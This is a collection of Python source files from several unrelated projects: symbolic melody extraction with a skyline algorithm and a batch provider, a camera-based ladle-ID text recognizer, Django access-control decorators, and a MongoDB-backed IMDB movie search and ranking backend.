part', 0 where there isn't)
predicted labels according to `in_notelist`
"""
# ordering notelist by onset:
notelist = in_notelist[in_notelist[:, 1].argsort()]
# changing all nan to 2 * EPS(0)
for i in np.nditer(pianoroll_prob, op_flags=['readwrite']):
if np.isnan(i):
i[...] = 2 * misc_tools.EPS(0)
# np.nan_to_num(pianoroll_prob, copy=False)
# looking for the first non empty column
s = pianoroll_prob.sum(axis=0).nonzero()[0]
# first column with non zero values minus first onset
pad_length = s[0] - in_notelist[0][1]
notelist = [(pitch, onset + pad_length, offset + pad_length, ismelody)
for pitch, onset, offset, ismelody in in_notelist]
# notelist has no more the ground-truth, so we are using in_notelist
true_labels = zip(*in_notelist)[-1]
THRESHOLD = settings.THRESHOLD
if settings.CLUSTERING != 'None':
THRESHOLD = set_threshold(
pianoroll_prob, CLUSTERING=settings.CLUSTERING)
if settings.MONOPHONIC:
# compute the graph matrix
predicted_labels = monophonic_part(
notelist, pianoroll_prob, THRESHOLD)[0]
else:
predicted_labels = polyphonic_part(
notelist, pianoroll_prob, THRESHOLD)
return np.array(true_labels), np.array(predicted_labels)
def test_shortest_path(test_notelists, predictions, pieces_indices=None, OUT_FILE=None):
""" This build a graph starting from *test_notelists* and *predictions* and
computes the minimum-cost path with Dijkstra's algorithm for DAG
non-negative weighted graphs.
It also computes Precision, Recall and F-measure for each piece in
*test_notelists* and the average F-measure.
*test_notelists* must be an array-like of notelists as created by
*misc_tools.load_files*
RETURNS:
a tuple of three lists containing:
* fmeasures
* precisions
* recalls
computed on pieces in the notelists in input
"""
fmeasure_list = []
precision_list = []
recall_list = []
for i in range(len(test_notelists)):
pianoroll_prob = predictions[i]
in_notelist = test_notelists[i]
true_labels, predicted_labels = predict_labels(
pianoroll_prob, in_notelist)
# compute fmeasure, precision and recall:
precision = sklearn.metrics.precision_score(
true_labels, predicted_labels)
recall = sklearn.metrics.recall_score(true_labels, predicted_labels)
fmeasure = 2 * precision * recall / (precision + recall)
if np.isnan(fmeasure):
fmeasure = 0.0
if (OUT_FILE is not None) and (pieces_indices is not None):
OUT_FILE.write("\nPiece number: " + str(pieces_indices[i]))
OUT_FILE.write("\nPrecision: " + str(precision))
OUT_FILE.write("\nRecall: " + str(recall))
OUT_FILE.write("\nF1-measure: " + str(fmeasure) + "\n")
print("Piece number: " + str(pieces_indices[i]))
print("Precision: " + str(precision))
print("Recall: " + str(recall))
print("F1-measure: " + str(fmeasure))
print("")
fmeasure_list.append(fmeasure)
precision_list.append(precision)
recall_list.append(recall)
if (OUT_FILE is not None) and (pieces_indices is not None):
OUT_FILE.flush()
# print("Avarage fmeasure scores: " + str(np.mean(fmeasure_list)))
return fmeasure_list, precision_list, recall_list
```
#### File: Symbolic-Melody-Identification/melody_extractor/skyline.py
```python
import numpy as np
from sklearn.model_selection import train_test_split
import sklearn.metrics
from data_handling import parse_data
import misc_tools
import settings
def skyline_pianorolls(input, onset=True):
"""
Perform the skyline algorithm on *pianoroll*. This just takes the
highest note at each time. If *onset* is True, then the original version is
used, in which the highest pitch belonging to the most recent onset is
considered to be the melody.
Reference paper:
<NAME> and <NAME>, "Melodic matching techniques for large
music databases," in Proceedings of the 7th ACM International Conference on
Multimedia '99, Orlando, FL, USA, October 30 - November 5, 1999, Part 1.,
1999, pp. 57-66.
RETURNS:
a new array of shape *pianoroll.shape* containing the resulting pianoroll
"""
pianoroll = np.array(input, dtype=misc_tools.floatX)
returned = np.zeros(pianoroll.shape, pianoroll.dtype)
for y, col in enumerate(pianoroll.T):
# iterating over columns
backup = False
for x, v in enumerate(col):
# iterating over pitches
if v != 0:
if onset:
if pianoroll[x, y - 1] == 0:
# new onset at highest pitch
returned[x, y] = v
backup = False
break
elif not backup:
# this is the highest value coming from a previous onset,
# store this value and add it after having parsed the whole
# column
backup = (x, y, v)
# N.B. now bool(backup) == True
else:
returned[x, y] = v
break
if backup:
# add the highest value coming from a previous onset
returned[backup[0], backup[1]] = backup[2]
backup = False
return returned
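# Usage sketch (toy pianoroll; the scan starts at row 0, so row 0 is assumed here to be
# the highest pitch):
#
#   roll = np.zeros((4, 3))
#   roll[3, :] = 1      # sustained lower note
#   roll[0, 1:] = 1     # higher note entering at step 1
#   sky = skyline_pianorolls(roll)
#
# With onset=True, step 0 keeps the note in row 3, while from step 1 on the new onset in
# row 0 wins and only that note is kept in the output.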
def test_skyline_pianorolls(PATH=settings.DATA_PATH):
import os
from data_handling import parse_data
# recurse all directories
dataset = []
for root, subdirs, files in os.walk(PATH):
# for each file with extension '.bz2'
for f in files:
if f[-3:] == ".bz":
new_file = os.path.join(root, f)
print("I've found a new file: " + new_file)
# load pianorolls score and melody
score, melody = parse_data.make_pianorolls(new_file)
dataset.append((score, melody))
train_set, test_set = train_test_split(
dataset, test_size=0.20, random_state=42)
overall_sk_tp = overall_sk_fp = overall_sk_tn = overall_sk_fn = 0
overall_hp_tp = overall_hp_fp = overall_hp_tn = overall_hp_fn = 0
avarage_pieces_sk = []
avarage_pieces_hp = []
for score, melody in test_set:
sk = skyline_pianorolls(score)
results = misc_tools.evaluate(sk, melody)
overall_sk_tp += results[0]
overall_sk_fp += results[1]
overall_sk_tn += results[2]
overall_sk_fn += results[3]
p = results[0] / misc_tools.EPS(results[0] + results[1])
r = results[0] / misc_tools.EPS(results[0] + results[3])
f = 2 * r * p / misc_tools.EPS(p + r)
avarage_pieces_sk.append((p, r, f))
hp = skyline_pianorolls(score, onset=False)
results = misc_tools.evaluate(hp, melody)
overall_hp_tp += results[0]
overall_hp_fp += results[1]
overall_hp_tn += results[2]
overall_hp_fn += results[3]
p = results[0] / misc_tools.EPS(results[0] + results[1])
r = results[0] / misc_tools.EPS(results[0] + results[3])
f = 2 * r * p / misc_tools.EPS(p + r)
avarage_pieces_hp.append((p, r, f))
# parse_data.plot_pianorolls(
# score, sk, out_fn=f + "_skyline.pdf")
# parse_data.plot_pianorolls(
# score, hp, out_fn=f + "_highestpitch.pdf")
print("Final Results Skyline:")
print("True positives: " + str(overall_sk_tp))
print("False positives: " + str(overall_sk_fp))
print("True negatives: " + str(overall_sk_tn))
print("False negatives: " + str(overall_sk_fn))
p = overall_sk_tp / misc_tools.EPS(overall_sk_tp + overall_sk_fp)
r = overall_sk_tp / misc_tools.EPS(overall_sk_tp + overall_sk_fn)
print("Precision: " + str(p))
print("Recall: " + str(r))
print("Fmeasures: " + str(2 * r * p / misc_tools.EPS(p + r)))
print("Average piece precision: " + str(np.mean(avarage_pieces_sk[0])))
print("Average piece recall: " + str(np.mean(avarage_pieces_sk[1])))
print("Average piece fmeasure: " + str(np.mean(avarage_pieces_sk[2])))
print()
print("Final Results Highest Pitch:")
print("True positives: " + str(overall_hp_tp))
print("False positives: " + str(overall_hp_fp))
print("True negatives: " + str(overall_hp_tn))
print("False negatives: " + str(overall_hp_fn))
p = overall_hp_tp / misc_tools.EPS(overall_hp_tp + overall_hp_fp)
r = overall_hp_tp / misc_tools.EPS(overall_hp_tp + overall_hp_fn)
print("Precision: " + str(p))
print("Recall: " + str(r))
print("Fmeasures: " + str(2 * r * p / misc_tools.EPS(p + r)))
print("Average piece precision: " + str(np.mean(avarage_pieces_hp[0])))
print("Average piece recall: " + str(np.mean(avarage_pieces_hp[1])))
print("Average piece fmeasure: " + str(np.mean(avarage_pieces_hp[2])))
def my_skyline_notelists(notelist):
"""
Perform a variation of the skyline algorithm by always taking the highest
pitch at each time.
*notelist* must be in the form returned by misc_tools.load_files
RETURNS :
the list of predicted labels, where 1 is for melody note and 0 is for
accompaniment
"""
# ordering notelist by onset
notelist = sorted(notelist, key=lambda x: x[1])
predicted_label = [0 for n in range(len(notelist))]
previous_onset = 99999999999 # the first time is not a new onset
last_melody_offset = 0
highest_pitch = 0
melody_index = 0
last_melody_pitch = 0
for i, (pitch, onset, offset, ismelody) in enumerate(notelist):
if pitch > highest_pitch:
# look for the highest pitch among notes at this onset
highest_pitch = pitch
melody_index = i
elif onset > previous_onset:
# this is a new onset:
# test if among notes at the previous onset there is a melody note
if highest_pitch > last_melody_pitch or previous_onset >= last_melody_offset:
# mark the new melody note
predicted_label[melody_index] = 1
last_melody_offset = notelist[melody_index][2]
last_melody_pitch = notelist[melody_index][0]
highest_pitch = 0
previous_onset = onset
return predicted_label
def skyline_notelists(notelist):
"""
performs the skyline algorithm in its original formulation over
the *notelist* in input.
*notelist* is in the form returned by misc_tools.load_files
Reference paper:
<NAME> and <NAME>, "Melodic matching techniques for large
music databases," in Proceedings of the 7th ACM International Conference on
Multimedia '99, Orlando, FL, USA, October 30 - November 5, 1999, Part 1.,
1999, pp. 57-66.
RETURNS :
the list of predicted labels, where 1 is for melody note and 0 is for
accompaniment
"""
# ordering notelist by onset
notelist = sorted(notelist, key=lambda x: x[1])
predicted_label = [0 for n in range(len(notelist))]
previous_onset = 99999999999 # the first time is not a new onset
highest_pitch = 0
melody_index = 0
for i, (pitch, onset, offset, ismelody) in enumerate(notelist):
# take all notes at this onset
if onset > previous_onset:
# this is a new onset
predicted_label[melody_index] = 1
highest_pitch = pitch
melody_index = i
elif pitch > highest_pitch:
# chose the highest pitch
highest_pitch = pitch
melody_index = i
previous_onset = onset
return predicted_label
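# Illustrative example (entries are (pitch, onset, offset, ismelody) tuples):
#
#   notes = [(60, 0, 4, 0), (72, 0, 2, 1), (65, 4, 8, 0), (67, 8, 10, 0)]
#   skyline_notelists(notes)   # -> [0, 1, 1, 0]
#
# The highest pitch of each onset group is marked once the next onset arrives, which is
# why the final group (the note starting at 8) is never flushed and stays 0.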
def test_skyline_notelists(PATH=settings.DATA_PATH, variation=False):
"""
This test the skyline algorithm on the whole dataset contained in *PATH*.
if *variation* is True, then *my_skyline_notelists* is used, otherwise
*skyline_notelists* is used.
"""
X, Y, map_sw, notelists = misc_tools.load_files(
PATH, 128, return_notelists=True)
del X, Y, map_sw
fmeasure_list = []
precision_list = []
recall_list = []
for i, notelist in enumerate(notelists):
if variation:
predicted_labels = my_skyline_notelists(notelist)
else:
predicted_labels = skyline_notelists(notelist)
true_labels = zip(*notelist)[-1]
precision = sklearn.metrics.precision_score(
true_labels, predicted_labels)
recall = sklearn.metrics.recall_score(true_labels, predicted_labels)
fmeasure = 2 * precision * recall / (precision + recall)
print("Piece number: " + str(i))
print("Precision: " + str(precision))
print("Recall: " + str(recall))
print("F1-measure: " + str(fmeasure))
print("")
fmeasure_list.append(fmeasure)
precision_list.append(precision)
recall_list.append(recall)
print("Average precision: " + str(np.mean(precision_list)))
print("Average recall: " + str(np.mean(recall_list)))
print("Average fmeasure: " + str(np.mean(fmeasure_list)))
if __name__ == '__main__':
# print("Testing with pianorolls...")
# print("__________________________")
# test_skyline_pianorolls()
DATA_PATH = settings.DATA_PATH
import sys
if len(sys.argv) > 1:
DATA_PATH = sys.argv[1]
print("Using data path: " + DATA_PATH)
print("Testing with notelists...")
print("__________________________")
test_skyline_notelists(PATH=DATA_PATH, variation=False)
# print("")
# print("And now the variation...")
# print("__________________________")
# test_skyline_notelists(variation=True)
```
#### File: Symbolic-Melody-Identification/nn_models/batch_provider.py
```python
import numpy as np
class RecurrentBatchProvider(object):
"""A class to load data from files and serve it in batches
for sequential models
"""
def __init__(self, dtype=np.float32):
self.data = []
self.sizes = []
self.dtype = dtype
def store_data(self, *args):
if not all([len(x) == len(args[0]) for x in args]):
raise Exception('The length of each array must be the same')
self.n_inputs = len(args)
dims = [None] * len(args)
for arrays in zip(*args):
for i, array in enumerate(arrays):
if not np.all(dims[i] == array.shape[1:]):
if dims[i] is None:
dims[i] = array.shape[1:]
else:
raise Exception(
'Cannot deal with variable output shapes')
self.data.append(arrays)
self.sizes.append(len(arrays[0]))
self.dims = dims
self._cs = np.r_[0, np.cumsum(self.sizes)]
def _make_batch_array(self, batch_size, segment_length, dim):
return np.empty([batch_size, segment_length] + list(dim), dtype=self.dtype)
def make_batch_arrays(self, batch_size, segment_length):
return [self._make_batch_array(batch_size, segment_length, dim)
for dim in self.dims]
def iter_pieces(self):
for arrays in self.data:
yield (array[np.newaxis, :].astype(self.dtype, copy=False)
for array in arrays)
def _get_batch(self, segment_producer, batch_size, segment_length,
batch_arrays=None):
if batch_arrays is None:
batch_arrays = self.make_batch_arrays(batch_size, segment_length)
else:
# Check that the number of given arrays is the same as the number of
# inputs
if len(batch_arrays) != self.n_inputs:
raise Exception(('Different number of arrays provided: {0} given '
'but {1} expected').format(len(batch_arrays),
self.n_inputs))
for i, (piece, segment_end) in enumerate(segment_producer(batch_size,
segment_length)):
arrays = self.data[piece]
start = segment_end - segment_length
start_trimmed = max(0, start)
for batch_a, array in zip(batch_arrays, arrays):
batch_a[i, - (segment_end - start_trimmed):] = array[
start_trimmed: segment_end]
if start < 0:
for batch_a in batch_arrays:
batch_a[i, :- (segment_end - start_trimmed)] = 0
return batch_arrays
def _select_segments_start(self, k, segment_size):
available_idx = np.array(self.sizes) - segment_size
valid = np.where(available_idx >= 0)[0]
try:
piece_idx = valid[np.random.randint(0, len(valid), k)]
except ValueError:
raise Exception(("No sequence in the dataset is long enough "
"to extract segments of length {}")
.format(segment_size))
return np.column_stack(
(piece_idx, np.ones(k, dtype=np.int) * segment_size))
def _select_segments_end(self, k, segment_size):
sizes = np.array(self.sizes)
available_idx = sizes - segment_size
valid = np.where(available_idx >= 0)[0]
try:
piece_idx = valid[np.random.randint(0, len(valid), k)]
except ValueError:
raise Exception(("No sequence in the dataset is long enough "
"to extract segments of length {}")
.format(segment_size))
return np.column_stack((piece_idx, sizes[piece_idx]))
def _select_segments_valid(self, k, segment_size):
available_idx = np.array(self.sizes) - segment_size + 1
valid = np.where(available_idx > 0)[0]
cum_idx = np.cumsum(available_idx[valid])
try:
segment_starts = np.random.randint(0, cum_idx[-1], k)
except ValueError:
raise Exception(("No sequence in the dataset is long enough "
"to extract segments of length {}")
.format(segment_size))
piece_idx = np.searchsorted(cum_idx - 1, segment_starts, side='left')
index_within_piece = segment_starts - np.r_[0, cum_idx[:-1]][piece_idx]
return np.column_stack(
# (valid[piece_idx], index_within_piece))
(valid[piece_idx], index_within_piece + segment_size))
def _select_segments_full(self, k, segment_size):
total_instances = self._cs[-1]
segment_ends = np.random.randint(1, total_instances + 1, k)
piece_idx = np.searchsorted(self._cs[1:], segment_ends, side='left')
index_within_piece = segment_ends - self._cs[piece_idx]
return np.column_stack((piece_idx, index_within_piece))
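# Illustrative example of the cumulative-sum bookkeeping: with piece sizes [10, 5, 8],
# self._cs is [0, 10, 15, 23]. A sampled segment end of 12 falls into piece 1, since
# np.searchsorted([10, 15, 23], 12) == 1, and maps to position 12 - 10 = 2 inside it.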
def get_batch_full(self, batch_size, segment_length,
batch_arrays=None):
"""
Return a batch from the stored data. The segments in the batch may start
before the start of a data sequence. In this case, they are zero-padded
on the left, up to the start of the sequence.
Parameters
----------
batch_size : int
The number of sequences to generate
segment_length : int
The desired length of the sequences
batch_arrays : list of ndarrays, optional
A list of arrays for storing the batch data in
Returns
-------
tuple
A tuple with ndarrays, containing the data for the batch
"""
return self._get_batch(self._select_segments_full, batch_size,
segment_length, batch_arrays)
def get_batch_valid(self, batch_size, segment_length,
batch_arrays=None):
"""
Return a batch from the stored data. Unlike `get_batch_full`, the
segments in the batch are always a subsequence of a data sequence. No
zero-padding will take place. Note that this implies that data from
sequences shorter than `segment_length` will never appear in the
returned batches.
Parameters
----------
batch_size : int
The number of sequences to generate
segment_length : int
The desired length of the sequences
batch_arrays : list of ndarrays, optional
A list of arrays for storing the batch data in
Returns
-------
tuple
A tuple with ndarrays, containing the data for the batch
"""
return self._get_batch(self._select_segments_valid, batch_size,
segment_length, batch_arrays)
def get_batch_start(self, batch_size, segment_length,
batch_arrays=None):
"""
Return a batch from the stored data. This function returns only segments
starting at the beginning of a data sequence.
Parameters
----------
batch_size : int
The number of sequences to generate
segment_length : int
The desired length of the sequences
batch_arrays : list of ndarrays, optional
A list of arrays for storing the batch data in
Returns
-------
tuple
A tuple with ndarrays, containing the data for the batch
"""
return self._get_batch(self._select_segments_start, batch_size,
segment_length, batch_arrays)
def get_batch_end(self, batch_size, segment_length,
batch_arrays=None):
"""
Return a batch from the stored data. This function returns only segments
ending at the end of a data sequence.
Parameters
----------
batch_size : int
The number of sequences to generate
segment_length : int
The desired length of the sequences
batch_arrays : list of ndarrays, optional
A list of arrays for storing the batch data in
Returns
-------
tuple
A tuple with ndarrays, containing the data for the batch
"""
return self._get_batch(self._select_segments_end, batch_size,
segment_length, batch_arrays)
if __name__ == '__main__':
n_inputs = 2
n_outputs = 2
n_pieces = 3
n_features = 4
min_piece_len = 15
max_piece_len = 30
# create some data
piece_lens = np.random.randint(min_piece_len,
max_piece_len + 1,
n_pieces)
X = [np.column_stack((np.ones(n_instances) * i,
np.arange(n_instances))).astype(np.int)
for i, n_instances in enumerate(piece_lens)]
Y = [np.random.random((n_instances, n_outputs, n_features))
for n_instances in piece_lens]
# Y = X
bp = RecurrentBatchProvider()
bp.store_data(X, Y)
for x, y in bp.iter_pieces():
print(x, y)
``` |
{
"source": "2019pee0029/laddleApp",
"score": 2
} |
#### File: 2019pee0029/laddleApp/setup_cv1.py
```python
import sys
sys.path.append('D://laddleApp')
from recoModel.demo import *
from recoModel.model import RecoModel
import string
import torch
import torch.backends.cudnn as cudnn
import torch.utils.data
from recoModel.utils import CTCLabelConverter, AttnLabelConverter
from recoModel.dataset import RawDataset, AlignCollate
from detectModel.test import *
from PIL import Image
import cv2 as cv
import threading
from log import log, setupTimeRotatedLog
setupTimeRotatedLog("Laddle-Id-detection.log", log)
#recognizer model
opt = initializeParsers()
opt.FeatureExtraction = 'ResNet'
opt.SequenceModeling = 'BiLSTM'
opt.Prediction = 'Attn'
opt.test_image = 'street_name.jpg'
opt.image_folder = 'result'
opt.Transformation = 'TPS'
opt.saved_model = 'D:\\laddleApp\\recoModel\\weights\\TPS-ResNet-BiLSTM-Attn.pth'
# detector model
args = initializeDetectModelParsers()
args.trained_model = "D:\\laddleApp\\detectModel\\weights\\craft_mlt_25k.pth"
args.test_folder = "D:\\laddleApp\\detectModel\\test2\\"
net = LoadDetectionModel(args)
reco = LoadRecoModel(opt)
#res = Recognize(opt,reco)
log.info("loaded all models")
class VideoCamera(object):
def __init__(self):
self.video = cv.VideoCapture(
'rtsp://172.16.31.10/cam/realmonitor?channel=1&subtype=1&unicast=true&proto=Onvif') #172.24.136.242:554
#self.video = cv.VideoCapture('D:\\AI DS Projects\\rec_17_30.avi')
(self.grabbed, self.frame) = self.video.read()
threading.Thread(target=self.update, args=()).start()
def __del__(self):
self.video.release()
def get_frame(self):
ret, image = self.grabbed, self.frame
return ret,image
def update(self):
while True:
(self.grabbed, self.frame) = self.video.read()
def DetectTextArea(image):
"takes an image frame and returns the text-detection results"
preds = PredictDetection(args, net, image, opt,reco)
return preds
cam = VideoCamera()
ret, frame = cam.get_frame()
while(ret):
ret, frame = cam.get_frame()
preds,img = (DetectTextArea(frame))
cv.imshow('frame',img)
cv.moveWindow('frame', 200, 200)
if cv.waitKey(1) & 0xFF == ord('q'):
cv.destroyAllWindows()
break
``` |
{
"source": "2019somsom/som-django-new-",
"score": 2
} |
#### File: som-django-new-/users/decorators.py
```python
from django.conf import settings
from django.shortcuts import redirect
from django.contrib import messages
import sys, os
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from eggmorning.models import User
from django.http import HttpResponse
def login_message_required(function):
def wrap(request, *args, **kwargs):
if not request.user.is_authenticated:
messages.info(request, "로그인한 사용자만 이용할 수 있습니다.")
return redirect(settings.LOGIN_URL)
return function(request, *args, **kwargs)
return wrap
def admin_required(function):
def wrap(request, *args, **kwargs):
if request.user.level == '1' or request.user.level == '0':
return function(request, *args, **kwargs)
messages.info(request, "접근 권한이 없습니다.")
return redirect('/users/main/')
return wrap
def logout_message_required(function):
def wrap(request, *args, **kwargs):
if request.user.is_authenticated:
messages.info(request, "접속중인 사용자입니다.")
return redirect('/users/main/')
return function(request, *args, **kwargs)
return wrap
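# Usage sketch (hypothetical view functions; the decorators wrap Django views):
#
#   @login_message_required
#   def board_view(request):
#       ...
#
#   @admin_required
#   def admin_view(request):
#       ...
#
# Unauthenticated requests to board_view are redirected to LOGIN_URL with a message,
# and non-admin users hitting admin_view are redirected to /users/main/.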
``` |
{
"source": "2019-Spring-Information-Retrieval/backend",
"score": 3
} |
#### File: aws_controller/advancedSearch/DatabaseDAO.py
```python
import queryWorker
import rankWorker
import pymongo
import bson.json_util
import pprint
class DatabaseDAO:
def __init__(self):
self.cacheDb = None
def connectToDatabase(self):
if self.cacheDb:
return self.cacheDb
client = pymongo.MongoClient("mongodb+srv://jack:<EMAIL>")
self.cacheDb = client['IMDBData']
return self.cacheDb
def advancedSearch(self, query: str):
q = queryWorker.QueryWorker()
words, index2docs = q.output(dao, query)
r = rankWorker.RankWorker(dao)
r.input(words, index2docs)
docs = r.output()
return docs
dao = DatabaseDAO()
# dao.connectToDatabase()
# print(dao.getOneMovie("Albela"))
# print(dao.getMovieFromTo(1,5))
# print(dao.getMovieFromTo("Drama",1,5))
# pprint.pprint(dao.getTopRated(10))
```
#### File: aws_controller/retrieveMovies/DatabaseDAO.py
```python
import pymongo
import bson.json_util
import pprint
from bson import ObjectId
class DatabaseDAO:
def __init__(self):
self.cacheDb = None
self.puncts = [',', '.', '"', ':', ')', '(', '-', '!', '?', '|', ';', "'", '$', '&', '/', '[', ']', '>', '%', '=', '#', '*', '+', '\\', '•', '~', '@', '£',
'·', '_', '{', '}', '©', '^', '®', '`', '<', '→', '°', '€', '™', '›', '♥', '←', '×', '§', '″', '′', 'Â', '█', '½', 'à', '…',
'“', '★', '”', '–', '●', 'â', '►', '−', '¢', '²', '¬', '░', '¶', '↑', '±', '¿', '▾', '═', '¦', '║', '―', '¥', '▓', '—', '‹', '─',
'▒', ':', '¼', '⊕', '▼', '▪', '†', '■', '’', '▀', '¨', '▄', '♫', '☆', 'é', '¯', '♦', '¤', '▲', 'è', '¸', '¾', 'Ã', '⋅', '‘', '∞',
'∙', ')', '↓', '、', '│', '(', '»', ',', '♪', '╩', '╚', '³', '・', '╦', '╣', '╔', '╗', '▬', '❤', 'ï', 'Ø', '¹', '≤', '‡', '√', ]
self.punct_mapping = {"‘": "'", "₹": "e", "´": "'", "°": "", "€": "e", "™": "tm", "√": " sqrt ", "×": "x", "²": "2",
"—": "-", "–": "-", "’": "'", "_": "-", "`": "'",
'“': '"', '”': '"', '“': '"', "£": "e", '∞': 'infinity', 'θ': 'theta', '÷': '/', 'α': 'alpha',
'•': '.', 'à': 'a', '−': '-', 'β': 'beta', '∅': '', '³': '3', 'π': 'pi', }
self.specials = {'\u200b': ' ', '…': ' ... ', '\ufeff': '', 'करना': '', 'है': ''}
def connectToDatabase(self):
if self.cacheDb:
return self.cacheDb
client = pymongo.MongoClient("mongodb+srv://jack:<EMAIL>")
self.cacheDb = client['IMDBData']
return self.cacheDb
def replace_punct(self, x):
x = str(x)
for p in self.punct_mapping:
x = x.replace(p, self.punct_mapping[p])
for punct in self.puncts:
x = x.replace(punct, '')#f' {punct} ')
for s in self.specials:
x = x.replace(s, self.specials[s])
return x.lower().split()
def getOneMovie(self, title):
return self.cacheDb['Movies'].find_one({"Title": title})
def getManyMovies(self, query, number):
text = '^'
for word in self.replace_punct(query):
text = text + word + "[ : -]*"
# if self.cacheDb['Movies'].count_documents({'Title': {"$regex": '^' + query , '$options':'i'}}) < int(number):
# return bson.json_util.dumps(self.cacheDb['Movies'].find({'Title': {"$regex": '^' + query, '$options':'i' }}))
# return bson.json_util.dumps(self.cacheDb['Movies'].find({'Title': {"$regex": '^' + query, '$options':'i'}}).limit(int(number)))
return bson.json_util.dumps(
self.cacheDb['Movies'].find({'Title': {"$regex": text, '$options': 'i'}}).limit(int(number)))
def countAll(self, genre):
return self.cacheDb['Movies'].count_documents({'Genre': {"$regex": ".*" + genre + ".*"}})
def getMovieFromTo(self, genre, start, end):
return bson.json_util.dumps(self.cacheDb['Movies'].find({'Genre': {"$regex": ".*" + genre + ".*"}}).skip(int(start)).limit(int(end)))
def getTopRated(self, num, minVote):
return bson.json_util.dumps(self.cacheDb['Movies'].find({"imdbRating": {"$lt": 10.1}, "imdbVotes": {"$gt": int(minVote)}}).sort([("imdbRating", -1), ("imdbVotes", -1)]).limit(int(num)))
dao = DatabaseDAO()
dao.connectToDatabase()
print(dao.replace_punct("Captain America: Civil "))
pprint.pprint(dao.getManyMovies("Captain America: C ", 100))
# pprint.pprint(dao.getWatchlist("<EMAIL>",1,1))
# dao.convert()
# pprint.pprint(bson.json_util.dumps(dao.check()))
# print(dao.getOneMovie("How to Train Your Dragon"))
# print(dao.getMovieFromTo(1,5))
# pprint.pprint(dao.getMovieFromTo("Drama",1,5))
# pprint.pprint(dao.getTopRated(10, 2000))
## First convert
# 5c97f29812c54d2e52ab3a08
# Hanging Perverts
# 64960
## Second convert
# 5c97fac912c54d2e52ab800c
# A Painting Lesson
# ------------
# 5c97fac912c54d2e52ab7f29
# Gearheads
# ------------
# 5c97fac912c54d2e52ab7f2d
# Inkaar
# ------------
# 5c97fac912c54d2e52ab7f37
# On the Verge
# ------------
# 5c97fac912c54d2e52ab7f91
# The City of Children
# ------------
#82673
## Third convert
# ------------
# 114018
# 5c982a3b12c54d2e52ad5940
# Kaos
# ------------
# 114019
# 5c982a3b12c54d2e52ad59ec
# Deadly Match
# ------------
# 114020
# 5c982a3b12c54d2e52ad585f
# Devadas
# ------------
# 114021
# 5c982a3b12c54d2e52ad597a
# Tropykaos
# ------------
#
#
# def convert(self):
# doc = self.cacheDb['Movies'].find().limit(64960)
# count = 1
# countError = 0
# for item in doc:
# try:
# item['imdbRating']
# except KeyError:
# countError = countError + 1
# continue
#
# if (item['imdbRating'] == "N/A"):
# countError = countError + 1
# continue
#
# try:
# vote = item["imdbVotes"].replace(",", "")
# except:
# countError = countError + 1
# continue
# if (item['imdbVotes'] == "N/A"):
# countError = countError + 1
# continue
#
# print(count)
# count = count + 1
# print((item['_id']))
# print((item['Title']))
# print("------------")
# self.cacheDb['Movies'].update_one({"_id": item["_id"]},
# {"$set":
# {"imdbRating": float(item['imdbRating']),
# "imdbVotes": int(vote)}},
# upsert=False)
#
#
# def check(self):
# return self.cacheDb['Movies'].find({"_id": ObjectId("5c97cf1112c54d2abe3dca49")})
# # return self.cacheDb['Movies'].find({"_id": { "$lt" : ObjectId("5c97fac912c54d2e52ab7f37")}}).count()
```
#### File: aws_controller/SetUpNewUser/lambda_function.py
```python
import json
from DatabaseDAO import DatabaseDAO, dao
from JSONEncoder import JSONEncoder
count = -1
def lambda_handler(event, context):
"""Sample pure Lambda function
Parameters
----------
event: dict, required
API Gateway Lambda Proxy Input Format
Event doc: https://docs.aws.amazon.com/apigateway/latest/developerguide/set-up-lambda-proxy-integrations.html#api-gateway-simple-proxy-for-lambda-input-format
context: object, required
Lambda Context runtime methods and attributes
Context doc: https://docs.aws.amazon.com/lambda/latest/dg/python-context-object.html
Returns
------
API Gateway Lambda Proxy Output Format: dict
Return doc: https://docs.aws.amazon.com/apigateway/latest/developerguide/set-up-lambda-proxy-integrations.html
"""
# try:
# ip = requests.get("http://checkip.amazonaws.com/")
# except requests.RequestException as e:
# # Send some context about this error to Lambda Logs
# print(e)
# raise e
# context["callbackWaitsForEmptyEventLoop"] = "false"
global dao
global count
count = count + 1
user = {}
user["email"] = event["request"]["userAttributes"]["email"]
user["nickname"] = event["request"]["userAttributes"]["nickname"]
dao.connectToDatabase()
dao.insertUser(user)
return event
```
#### File: 2019-Spring-Information-Retrieval/backend/rankWorker.py
```python
from typing import List, Dict
from sklearn.feature_extraction.text import TfidfTransformer
import numpy as np
from collections import defaultdict
from functools import reduce
from pymongo import MongoClient
np.set_printoptions(precision=5)
def getFinalScore(scores: List[float], names: List[str]=None):
weights = {'freq-plot': 0.79, 'freq-script': 0.63,
'freq-title': 0.88, 'post-script': 0.63, 'post-plot': 0.51}
cur_weight = [weights[n] for n in names]
new_weight = [w / sum(cur_weight) for w in cur_weight]
results = 0
for ix, score in enumerate(scores):
results += new_weight[ix] * score
return results
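# Illustrative example (arbitrary values): getFinalScore([0.9, 0.4], ['freq-title', 'freq-plot'])
# renormalises the raw weights 0.88 and 0.79 to sum to 1 (~0.53 and ~0.47), so the
# combined score is roughly 0.53 * 0.9 + 0.47 * 0.4 ~ 0.66.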
class RankWorker(object):
"""Rank the documents retrieved from the inverted indexes and fetch
the original records from the database.
"""
def __init__(self):
self.index2docs = {} # indextype : {word:{docid:freq}}
self.doc2vecs = {} # indextype : {doc: feature matrix}
self.docs2score = {}
self.ix_to_doc = {}
self.doc_to_ix = {}
self.word_to_ix = {}
self.qwords = []
self.index_ids = None
self.limit_docs = None
def input(self, qwords: List, index2docs: Dict, limit: int=None):
"""
"""
# print(index2docs)
self.index2docs = index2docs
self.qwords = qwords
self.index_ids = list(index2docs.keys())
if limit is not None:
self.limit_docs = limit
def precheck(self)->bool:
"""
check whether the retrieval results and the query are non-empty
"""
flag = True
self.word2index()
self.docs2index()
if len(self.index2docs) <= 0:
flag = False
elif len(self.qwords) == 0:
flag = False
elif max([len(self.index2docs[idx]) for idx in self.index_ids]) == 0:
flag = False
elif len(self.word_to_ix) == 0:
flag = False
elif len(self.doc_to_ix) == 0:
flag = False
return flag
def word2index(self):
for w in self.qwords:
if w not in self.word_to_ix:
self.word_to_ix[w] = len(self.word_to_ix)
def docs2index(self):
"""
"""
# collect every document that appears in the retrieved postings
for idx in self.index_ids:
for wd in self.word_to_ix.keys(): # for every query word
if wd not in self.index2docs[idx]:
continue
for d in self.index2docs[idx][wd].keys(): # for every doc id
if d not in self.doc_to_ix:
self.doc_to_ix[d] = len(self.doc_to_ix)
# build the reverse mapping: index -> doc id
